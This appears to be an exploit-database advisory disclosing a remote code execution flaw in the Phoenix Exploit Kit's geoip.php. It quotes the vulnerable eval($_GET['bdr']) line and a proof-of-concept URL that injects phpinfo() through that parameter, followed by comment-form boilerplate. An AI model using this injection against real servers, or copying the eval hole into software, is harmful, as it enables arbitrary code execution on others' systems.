Phoenix Exploit Kit Remote Code Execution

2016.07.02

Credit: CrashBandicot

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: Phoenix Exploit Kit - Remote Code Execution
# Exploit Author: CrashBandicot @DosPerl
# Date: 2016-06-30
# Tested on: MSWin32
 
# Vuln file : geoip.php
 
492.  isset($_GET['bdr']) ? eval($_GET['bdr']) : explode('nop','nop nop nop');
 
# PoC : http://localhost/Phoenix/includes/geoip.php?bdr=phpinfo();

# Screen : http://i.imgur.com/E7RBBRk.png

__END__

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Phoenix Exploit Kit Remote Code Execution

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.